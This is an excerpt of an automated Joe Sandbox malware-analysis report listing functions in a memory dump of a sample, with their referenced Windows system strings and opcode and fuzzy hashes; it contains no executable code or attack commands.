LdrResSearchResource Enter, xrefs: 012BAA13

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 779fec0aabdb28217176ff5fee09e0d47c70704b47ba8d4647f7ed7611b8d994
Instruction ID: 6a8ddfedb322bca9bb92870684c82f82871a8812b4cc5e2412ea0e01d68c1c26
Opcode Fuzzy Hash: 779fec0aabdb28217176ff5fee09e0d47c70704b47ba8d4647f7ed7611b8d994
Instruction Fuzzy Hash: ECE18171E20209AFEF26CE99C980BEEBBB9FF14354F104429EA11E7255E7749941CB50

Function 0137A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0137A44B
`, xrefs: 0137A551

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: d043d83a1ff3ffdb6fa4b52344fb026bc1bdcd4d4ec0a3209ac7697c6afc7186
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 28C1CE312043469BEB34CF28C845B6FBBE5AFC4728F084A2DF6969B290D779D505CB81

Function 0132E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0132E751
Legacy, xrefs: 0132E75A

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 7e353471edcc8e406bc6ac7b2abba0563e481d6319269b398797441505341be0
Instruction ID: f247ac4e5f77cf1af732aaa7d9f2024da244cebac0fc09eb1a84a6af46cc4a61
Opcode Fuzzy Hash: 7e353471edcc8e406bc6ac7b2abba0563e481d6319269b398797441505341be0
Instruction Fuzzy Hash: CE616E71E103299FDB14EFA9C841BAEBBB9FB44704F14407DE649EB291D771A900CB50

Function 013543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01354437
MUI, xrefs: 01354525

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: e71634298b8018b440d7d6f3e6ba365f916a2c928586a4f62bd5e034c57d5a2f
Instruction ID: f691cfefec0cd3093e948cad21151876feb321ffce6b708a54ba4e3b9230278f
Opcode Fuzzy Hash: e71634298b8018b440d7d6f3e6ba365f916a2c928586a4f62bd5e034c57d5a2f
Instruction Fuzzy Hash: 45512C71D5021DAFDB15DFA5CC84EEEBBBCEB44B58F100529EA11B7290E6309D45CBA0

Function 012B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012B063D
kLsE, xrefs: 012B0540

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: ea61e771406a6cd752dcc0e5c5dacea6b2dc8f1693ad0ffcd77369ad5d75f185
Instruction ID: 001a862e5f18c37ced38428748f23904c91cee77e9e2a9e1623f9ad8b6ab46b3
Opcode Fuzzy Hash: ea61e771406a6cd752dcc0e5c5dacea6b2dc8f1693ad0ffcd77369ad5d75f185
Instruction Fuzzy Hash: 2F51AE715247428FD726EF68C4806E7BBF4AF84344F10883EE6AA87641E770E545CB9A

Function 012BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 012BA309
RtlpResUltimateFallbackInfo Enter, xrefs: 012BA2FB

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 194478ef848eee39d89ebca00a88a21989b711736c2002520f1b1e0b22ce9367
Instruction ID: a62a41a5619e39a1130522efb752e2f03f1777f12a5eb57d7291f8b0ba7d0f08
Opcode Fuzzy Hash: 194478ef848eee39d89ebca00a88a21989b711736c2002520f1b1e0b22ce9367
Instruction Fuzzy Hash: D741E230A2564ADFDB15CF5DC880BAE7BB4FF84744F248069EA11DB295E3B5D940CB40

Function 012EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 012EA5E4
Threadpool!, xrefs: 012EA5E9

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 8df0966a72ba3b167c9efc13c9eb1c72bbb6a2bfc214876bad3a9d965c94c0d1
Instruction ID: 707e27c8c609e0b0a23ac376fea6a8b8932b8631a7ec4d564c03e282f29daec6
Opcode Fuzzy Hash: 8df0966a72ba3b167c9efc13c9eb1c72bbb6a2bfc214876bad3a9d965c94c0d1
Instruction Fuzzy Hash: F801D1B2260700AFD711DF14CE4AB2677E8F795725F058979A658C7190E374D804CB46

Function 012BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 012BC8C3, 012BCA40

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f47c377436d8db4bdc931faa86800b8187bf1073e2af779dae036835f0d6bd48
Instruction ID: 3ba26ed2b3691076853105f75bd86ec54c3243e3b57cb9bd930ac871067f5c3e
Opcode Fuzzy Hash: f47c377436d8db4bdc931faa86800b8187bf1073e2af779dae036835f0d6bd48
Instruction Fuzzy Hash: F2827D75E202198FEB25CFA8C8807EDBBB1FF48394F14816AEA59AB251D7709D41CF50

Function 01336420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 013365C1

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4990fe0e18e717ca7c37e15fe9dbb63717e6c79a8892212a1a92a1d975999e59
Instruction ID: cbcc0e92827ec304f4edab70c40af003411c4dc617b9421a6e1cfacd366d881c
Opcode Fuzzy Hash: 4990fe0e18e717ca7c37e15fe9dbb63717e6c79a8892212a1a92a1d975999e59
Instruction Fuzzy Hash: 1D9171B1A50219BFEB21DF95CC85FAEBBB8EF45B54F114025F700AB191D774AA00CBA4

Function 0135E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0135E1FA

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 97fd0842cafb4c4fde847463af2a3401422c31ed3c804d78f864106d211f158d
Instruction ID: 342241e917494aa37e7134a3fc849f34fc3253f4abb707e14a68f6b771fd63b1
Opcode Fuzzy Hash: 97fd0842cafb4c4fde847463af2a3401422c31ed3c804d78f864106d211f158d
Instruction Fuzzy Hash: C291A132900649AFDB26AFA4DC44FEFFBB9EF45B44F100029FA01A7251E7749A01CB90

Function 012EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 013267C9

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: b05e0f6b9978078ec2e3b225deac0b6d7141a3139d7a4dbedbe67d15c4f3a104
Instruction ID: 16fa19332b501f8b283ba6732865d414c7e75d8becfa6165d94c6f41832566a0
Opcode Fuzzy Hash: b05e0f6b9978078ec2e3b225deac0b6d7141a3139d7a4dbedbe67d15c4f3a104
Instruction Fuzzy Hash: 497170B5E0022ACFDF28EF9CD591AADBBB1BF48714F14812EE905A7241E7719941CB50

Function 01354978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01354A7F

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 5012d9d2b1ba29c2761bf548abc185bd1676b4e0d126b57f48b88024737c7c63
Instruction ID: 4901c70bbd750949e591c43d62cdf5d106bdfa75e5c5793d24b97196e68300ea
Opcode Fuzzy Hash: 5012d9d2b1ba29c2761bf548abc185bd1676b4e0d126b57f48b88024737c7c63
Instruction Fuzzy Hash: E551C772D1022A9BDF58DFA9C840EEEBBB4AF04E58F054129EE51B7240E3349C41CBE0

Function 012CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 012CE6A4

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: e7dae4bdded477019d512128e0befc83ea3246157a317c519d5623bf49953c31
Instruction ID: 16b3b78df4fd30933f12e402838ab26d050c86716179f368523a755e477a7d6b
Opcode Fuzzy Hash: e7dae4bdded477019d512128e0befc83ea3246157a317c519d5623bf49953c31
Instruction Fuzzy Hash: 6641B3725283429BD724DA75C840B6FBBE8AF98B04F450B2DFB84E7180E774D908C796

Function 0132C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0132C77F

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 0fde36151f29732a972542b53cb2b2de5361da042ab1853461886307b081865a
Instruction ID: 0c61a4fedc22aeee79cb401052985c949cdb7b2f39ab810b546ef6056ec36ff9
Opcode Fuzzy Hash: 0fde36151f29732a972542b53cb2b2de5361da042ab1853461886307b081865a
Instruction Fuzzy Hash: FE4116B1D1052DABDB21EA54CC84FEEB77CAB55718F0085E9EB08A7140DB709E89CF94

Function 01346B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01346B91

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: bf9bfcde5265b1164fc22516ddd37b6c1b9299d4a002b9096c4ec9dc939f34ae
Instruction ID: 37fe4632a0d6ddd49b93469559a73158f741c6f47dca6c4dbc3557345eef6907
Opcode Fuzzy Hash: bf9bfcde5265b1164fc22516ddd37b6c1b9299d4a002b9096c4ec9dc939f34ae
Instruction Fuzzy Hash: D3312871A007599BEF22DF69C851BAEBBE8DF46708F50402CEA41AB282C775FC05CB54

Function 0132CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0132CAA2

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 556fa1790f6097f92fecbd283e0e8e0f99e142a3c4379f9c967f32a6f52542d2
Instruction ID: fe780fe7808014ad8da8e1bac71147bd838ca33f2eb072689cc148696bff3243
Opcode Fuzzy Hash: 556fa1790f6097f92fecbd283e0e8e0f99e142a3c4379f9c967f32a6f52542d2
Instruction Fuzzy Hash: 8231063690052AAFEB15EB59C855EBFFB74EF80768F014129EA05A7251D730DE04DBE0

Function 0133892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0133895E

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 0a9c088292fdb1c8e4881c433952846b6ee6adc67121b7096655780c0d136899
Instruction ID: cc1afe68d3629347a761794f6308de304ace7109c5a100f3610894d697c7dc10
Opcode Fuzzy Hash: 0a9c088292fdb1c8e4881c433952846b6ee6adc67121b7096655780c0d136899
Instruction Fuzzy Hash: 8B0126322102059FE7246F59DCC4BEA7B79EFD539CF44066CF64226551CB20AC81C79A

Function 01352000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dceb39cd584f5161d1810f97dc7a834f94eae551e8e89c9b9afa0698e0e4606
Instruction ID: 431288dbefd08cabc5d5b0668e3d06a5cdf915a57abb79e38b74440f88472100
Opcode Fuzzy Hash: 8dceb39cd584f5161d1810f97dc7a834f94eae551e8e89c9b9afa0698e0e4606
Instruction Fuzzy Hash: E942D276608341DBD7A5CF68C890E6BBBE5BF88B08F08092DFE8297251D770D945CB52

Function 01348158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bafda856dc435d83b09a567b05f439ed43c4cde610e4de1477be4c65e36d26c3
Instruction ID: fd9207ada9962d92e0dcfa175720e7a256bf1042118ec321ac3e87585dc13acd
Opcode Fuzzy Hash: bafda856dc435d83b09a567b05f439ed43c4cde610e4de1477be4c65e36d26c3
Instruction Fuzzy Hash: 86425C75E102198FEB25CFA9C881BADBBF5BF48314F1481D9E949EB242D734A981CF50

Function 012C2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a785753a63428a3faae43116b62515b853af0f88b5a042fc286bfe877ea96c
Instruction ID: 583d4510de25539a3edd263deee1165dc3a3b8273ecdb6af8802b6008ffa9051
Opcode Fuzzy Hash: 17a785753a63428a3faae43116b62515b853af0f88b5a042fc286bfe877ea96c
Instruction Fuzzy Hash: 463213B0A00759CFDB28CFA9C8457BEBBF6BF84708F24451DD5469B689DBB4A801CB50

Function 0135A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8eda5e83051fb2727a7f4f931fe875c6897a229cf193e32c5d5b08288a61d7e
Instruction ID: 2b22b1e59be96afae3cd3992960801f9a87526f876692082267a10ae30886498
Opcode Fuzzy Hash: a8eda5e83051fb2727a7f4f931fe875c6897a229cf193e32c5d5b08288a61d7e
Instruction Fuzzy Hash: 4622E3702046558FEBA5CF2DC050B72BBF1AF44B4CF08865ADD868F686E335D552EB60

Function 012B6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83be4c147b45181f10677ac8cdb9d46b0532e7727a18e16ef6cfb52b7bfd04f
Instruction ID: c349985869fde7e073fbb41f6bc4d2ef0efc2f56ab83504a1bf46360aea876bb
Opcode Fuzzy Hash: b83be4c147b45181f10677ac8cdb9d46b0532e7727a18e16ef6cfb52b7bfd04f
Instruction Fuzzy Hash: D532AB71A10206CFDB29CF68C480BEABBF1FF48314F148569EA56AB395DB74E841CB50

Function 012D4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 90e2e0ceeed80270a6454e1324931dd3207aea68c3d5088c25362e85e7e24d01
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: FAF19270E1024A9BDF19DF99C580BAEFBF5BF48714F048129EA41AB754E774E841CB60

Function 0134892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48693767ddda9d9833cb5200d44cb2d25b57ac3b45148cdc8147a23bf8cb4672
Instruction ID: 77876f911d1b672783978f11c10d574611b2a87c02e7ef8ce47c1849c3fddd83
Opcode Fuzzy Hash: 48693767ddda9d9833cb5200d44cb2d25b57ac3b45148cdc8147a23bf8cb4672
Instruction Fuzzy Hash: FED1D171E0060A9FDF15CFA9C841AFEB7F5AF88308F1881A9D955A7241D735F905CB60

Function 012B65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 934c9cedcfbeeeb8c9b2e59336404b20200004bb93983f72b76e2e16c574e5a5
Instruction ID: 518f392c9fa47a85dd789da0a75af697f7adbeaae874378ff162f19dbb0e5639
Opcode Fuzzy Hash: 934c9cedcfbeeeb8c9b2e59336404b20200004bb93983f72b76e2e16c574e5a5
Instruction Fuzzy Hash: 4FE1A171518342CFC715CF28C4D0AAABBE1FF89354F058A6DEA9587351DB31E905CB92

Function 012A8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5072576aaafce1201ae1c6b287480e835fa6eb587387f70fdc723cfec237266e
Instruction ID: d615b5d0e7047855dadbbc1d4eb4dea413da927cfd0af6748af813fe6dea4c0f
Opcode Fuzzy Hash: 5072576aaafce1201ae1c6b287480e835fa6eb587387f70fdc723cfec237266e
Instruction Fuzzy Hash: 9AD1E375A2060ADBDB19DF28CC91ABABBF5FF54319F44462DEA12DB280E730D950CB50

Function 01338243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: f06eea2da7c02acac7206cc8bf93d0fcb728527dd0663f95815a264c91749319
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 1CB16274A00609AFDF24DF99C940AABBBB9FFC4308F14459DBA52D7790DA34E905CB14

Function 012C0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 8c18f7ed79c4eb93985dce810d004fd55b06da56da0c52911b4883e6f3c8dd1e
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: ACB12335620646EFDB19CBA8C840BBEBBF6BF84704F144268E6429B385D730ED41CB94

Function 012B83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1de68cebaf441dc8c32213958ba333ca40157131dcad89b1b41ec888b4eba6
Instruction ID: 6bafe1766e00eaff4a875493309a6762112193b1aff69cf09aa09ecd056d490a
Opcode Fuzzy Hash: ee1de68cebaf441dc8c32213958ba333ca40157131dcad89b1b41ec888b4eba6
Instruction Fuzzy Hash: 11C157742183418FD764DF28C484BABB7E8FF88348F44496DEA8987295D774E948CF92

Function 012AC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d4710dd523f49c5666e13b8970e41cf9c429df420b772da17fd6d3b1883607
Instruction ID: aee3a83dfb0ecd7a22fc4261ee1dbb03cba2d016c0f5cf4418991f46dc674bdf
Opcode Fuzzy Hash: 31d4710dd523f49c5666e13b8970e41cf9c429df420b772da17fd6d3b1883607
Instruction Fuzzy Hash: 99B16170A102668BDB25DF58D890BB9B3F5EF44704F4485EAE54AE7281EB709D85CF20

Function 012DE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28932c885f105e0cf872c8c83eab6cd171de3251d5641c846fd2c159125909ed
Instruction ID: 639565843b90db65e83b0d2796a976c7376ba5187c4b923410a22db4494107d1
Opcode Fuzzy Hash: 28932c885f105e0cf872c8c83eab6cd171de3251d5641c846fd2c159125909ed
Instruction Fuzzy Hash: 14A13731E106599FEB26DB9CC844BAEBBB8BF00718F064225EB10AB2D5D7749D44CBD1

Function 012F0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076a95b615eed6b41b5e4a7b386d240c7a692200cb4121c755e2e487b6df695d
Instruction ID: 184a788050ff9ad27fb7169921cb93c084fa9b8d18d09514e329e4b9072502df
Opcode Fuzzy Hash: 076a95b615eed6b41b5e4a7b386d240c7a692200cb4121c755e2e487b6df695d
Instruction Fuzzy Hash: 49A1D370B206269BEB25DF69C491BBAF7A6FF44328F04403DEB0597282DB74E801CB54

Function 01384500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228b6208d1012914ccb3438bb90795defccf3c050e783a91253430691a920ce5
Instruction ID: fcf4c2395904cdbb9bb92badb20e44c4ac4ee952774b8fb07865406ba75b6f0f
Opcode Fuzzy Hash: 228b6208d1012914ccb3438bb90795defccf3c050e783a91253430691a920ce5
Instruction Fuzzy Hash: 47A1CD72A20312DFC721EF28C980B6ABBE9FF58718F45062CF6459BA50D734E900CB91

Function 01382B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: edcdc505bdfae12217251e3f108da0fe796f020ee3cd89e3306916fedaaded59
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: 14B13971E0061ADFDF19DFA9C880AAEBBB5FF48314F148129E918A7350D730A945CB94

Function 013360E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8228ecdc92830d3949688f970fc0b2ee7af1d6d5ee6855831b29ae29d6b0d6
Instruction ID: 359a9d4433c018e2750364719491fd3088fd547fdd608490d9af5190ef899a1e
Opcode Fuzzy Hash: 2a8228ecdc92830d3949688f970fc0b2ee7af1d6d5ee6855831b29ae29d6b0d6
Instruction Fuzzy Hash: BA9194B1D0021ABFDB15CF68D885BBEBFB5AF88714F154159E610EB351D734DA008BA4

Function 012CE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

